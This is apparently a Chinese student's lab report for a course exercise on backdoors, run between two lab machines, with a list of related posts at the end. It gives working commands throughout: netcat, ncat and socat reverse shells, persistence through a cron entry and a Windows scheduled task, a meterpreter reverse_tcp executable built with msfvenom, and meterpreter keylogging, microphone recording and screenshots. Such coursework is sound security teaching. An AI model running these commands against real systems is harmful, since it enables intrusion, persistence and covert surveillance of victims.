220164323 Exp2 后门原理与实践
(1)例举你能想到的一个后门进入到你系统中的可能方式?
在使用盗版软件,盗版系统,甚至游戏外挂时,往往会让我们关闭杀毒软件,。
(2)例举你知道的后门如何启动起来(win及linux)的方式?
win:任务计划启动
linux:通过cron启动
(3)Meterpreter有哪些给你映像深刻的功能?
无论是截屏,拍照,还是录音,都会泄露隐私,
(4)如何发现自己有系统有没有被安装后门?
通过查阅任务计划以及进程里是否有可疑项,安装杀毒软件也是一种方式。
Linux:192.168.38.128
Win10:192.168.1.144
学习ncat的使用
1.Win获得Linux Shell
- Win10打开cmd命令行,在ncat解压目录下,输入
ncat.exe -l -p 4323
对4323
端口进行监听 - 在Linux终端输入
nc 192.168.1.144 4323 -e /bin/sh
反弹连接Windows4323
端口 - Win10已获得Linux shell 虽然windows和Linux建立了连接,但是windows上使用正确的linux指令不会显示内容,但使用错误的linux指令会在linux上报错,我一直没有找到问题在哪,改了字符集也不会显示,在之后两者进行传输消息时,windows可以传输消息给linux,但linux上的消息不会再cmd上显示,不知道原因,如果有人可以帮我找到问题的话,请告诉我
2.Linux获得Win Shell
- Linux下打开一个终端,输入
nc -l -p 4323
对4323
端口进行监听 在Win命令行输入
ncat.exe -e cmd.exe 192.168.38.128 4323
反弹连接Linux4323
端口Linux已获得Win shell
3.使用nc传输信息
- Win10命令行输入
ncat.exe -l 4323
监听4323
端口 Linux终端输入
nc 192.168.1.144 4323
反弹连接windows4323端口建立连接后可互传信息
4.使用nc传输文件
- Win10命令行输入
ncat.exe -l 4323 > 1.txt
监听5228
端口,并设置收到的文件重定向保存到1.txt
Linux终端输入
nc 192.168.1.144 4323 < 2.txt
反弹连接Win104323端口Win10可收到Linux发来的文件。
实验内容
任务一:使用netcat获取主机操作Shell,cron启动
1、设定cronCron是Linux下的定时任务,每一分钟运行一次,根据配置文件执行预设的指令。详细说明可以"man cron"。
- Win7中打开对端口
4323
端口的监听。ncat.exe -l -p 4323
- Linux下使用
crontab -e
指令增加一条定时任务,-e
表示编辑 - 选择
3
,即编辑器。
根据m分钟 h小时 dom日期 mon月 dow周几 command执行的命令
的格式添加最后一行45* * * * /bin/netcat 192.168.1.144 4323 -e /bin/sh
保存退出
任务二:使用socat获取主机操作Shell, 任务计划启动
1、新建任务计划
- 原理: 在主控机的nc打开对4323端口的监听时,受控机的每一次锁定时都会启动ncat,相当于在cmd执行
ncat.exe -e cmd.exe 192.168.1.144 4323
,从而反弹连接到Linux。即Linux得到Win10 shell。
新建触发器:当锁定任何用户的工作站时
新建操作:
启动程序:socat所在路径\socat.exe
添加参数:tcp-listen:4323 exec:cmd.exe,pty,stderr
Linux终端输入socat - tcp:192.168.1.144:4323
,结果验证:
任务三:使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
-
在Linux终端执行
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168. 38.128 LPORT=4323 -f exe > 20164323_backdoor.exe
生成后门程序20164323_backdoor.exe Win下执行
ncat.exe -l 4323 > 20164323_backdoor.exe
监听4323
端口,- Linux终端执行
nc 192.168.1.144 4323 < 20164323_backdoor.exe
反弹连接Win7并传输文件20164323_backdoor.exe
Linux终端执行
msfconsole
命令,并设置好IP地址和端口号
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > show options
执行监听
Win运行后门程序
Linux平台的监听进程将获得Win主机的主动连接,并得到远程控制shell。
任务四:使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
record_mic
录制一段音频-
screenshot
进行截屏 使用
screenshot
指令可以进行截屏- 在kali中使用
keyscan_start
指令开始,在windows中记录下击键的过程,使用keyscan_dump
指令读取击键的记录: -
使用
getuid
指令查看当前用户 -
实验中遇到的问题
虽然windows和Linux建立了连接,但是windows上使用正确的linux指令不会显示内容,但使用错误的linux指令会在linux上报错,我一直没有找到问题在哪,改了字符集也不会显示,在之后两者进行传输消息时,windows可以传输消息给linux,但linux上的消息不会在cmd上显示,还有生成后门时,弄混linux和windows的Ip地址造成很多次的监听错误,还有碰到防火墙还有杀毒软件的问题,之前生成的后门都被杀软杀掉了,而且没要找到传输过来的软件,最后我是利用杀毒软件找到的传输文件。
实验感想
这次的实验非常有意思,但觉得也很危险,通过这次实验更加了解了后门,同时加深了自己的警惕意识。黑客可能通过后门控制我们的电脑,通过截屏,击键记录还有摄像头来了解我们的信息,我们在平时一定要注意防范。
Exp2 后门原理与实践 20164323段钊阳的更多相关文章
-
Exp3 免杀原理与实践 20164323段钊阳
网络对抗技术 20164323 Exp3 免杀原理与实践 免杀 一般是对恶意软件做处理,让它不被杀毒软件所检测.也是渗透测试中需要使用到的技术. 要做好免杀,就时清楚杀毒软件(恶意软件检测工具)是如何 ...
-
2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践 1. 后门原理与实践实验说明及预备知识 一.实验说明 任务一:使用netcat获取主机操作Shell,cron启动 ( ...
-
2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践 实验内容(概要): (1)使用netcat获取主机Shell,cron启动 首先两个电脑(虚拟机)都得有netcat, ...
-
2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践
- 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践 - 实验任务 (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主 ...
-
2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践 一.实验要求 (3.5分) (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用soc ...
-
2018-2019-2 20165235《网络对抗技术》Exp2 后门原理与实践
2018-2019-2 20165235<网络对抗技术>Exp2 后门原理与实践 实验内容 1.使用netcat获取主机操作Shell,cron启动 2.使用socat获取主机操作Shel ...
-
2018-2019-2 网络对抗技术 20165311 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165311 Exp2 后门原理与实践 后门的基本概念 常用后门工具 netcat Win获得Linux Shell Linux获得Win Shell Met ...
-
2018-2019-2 网络对抗技术 20165317 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165317 Exp2 后门原理与实践 基础问题回答 例举你能想到的一个后门进入到你系统中的可能方式? 下载免费应用的时候会有绑定木马. 浏览某些网页时会有内 ...
-
2018-2019-2 网络对抗技术 20165336 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165336 Exp2 后门原理与实践 1.基础问题回答 (1)例举你能想到的一个后门进入到你系统中的可能方式? 下载自己不熟悉的软件时含有病毒. 网络钓鱼, ...
随机推荐
- 通过源码成功启动odoo 10.0
-
paip.操作符重载的缺失 Java 的一个大缺点
paip.操作符重载的缺失 Java 的一个大缺点 #----操作符重载的作用 1.提升用户体验 操作符重载..可以让代码更加自然.... 2.轻松实现代码代码移植 例如 java代码会直接移植到 ...
-
使用Python做科学计算初探
今天在搞定Django框架的blog搭建后,尝试一下python的科学计算能力. python的科学计算有三剑客:numpy,scipy,matplotlib. numpy负责数值计算,矩阵操作等: ...
-
客户机增加域 及server文件共享
客户机要增加域,右击我的电脑--属性--更改--域,输入域名.例:输入域名company.com中的company , 后面的com不要加. 再在弹出的窗体中输入域管理员的完整username(use ...
-
搭建go语言idea开发环境
1.首先下载golang安装包,并配置好环境变量,此处略去相关操作,可能需要搭*. 2.下载idea golang插件,并安装: 下载地址如下: https://plugins.jetbrains. ...
-
C#之不安全代码
MSDN:"尽管实际上对 C 或 C++ 中的每种指针类型构造,C# 都设置了与之对应的引用类型,但仍然会有一些场合需要访问指针类型.例如,当需要与基础操作系统进行交互.访问内存映射设备,或 ...
-
hdu 5877 Weak Pair (Treap)
链接:http://acm.hdu.edu.cn/showproblem.php?pid=5877 题面; Weak Pair Time Limit: 4000/2000 MS (Java/Other ...
-
debian系统下apache2开启ssi功能
SSI (Server Side Include)的 html 文件扩展名 (.shtml), 通常称为"服务器端嵌入"或者叫"服务器端包含"说白了就是类似其他 ...
-
Delphi 7~XE系列升级安装Indy10.6
由于低版本Indy无法满足网络技术的日益更新,如SSL/TLS请求.RawHeaders与Cookie管理等问题处理. 我本身一直在用Delphi 2007,因为D2009开始底层的编码已不同,旧项目 ...
-
Jenkins官方教程地址入口
https://jenkins.io/doc/book/ 其实Jenkins的核心在于插件,官方教程只能是基本简单的,所以要找教程最好对应插件来找.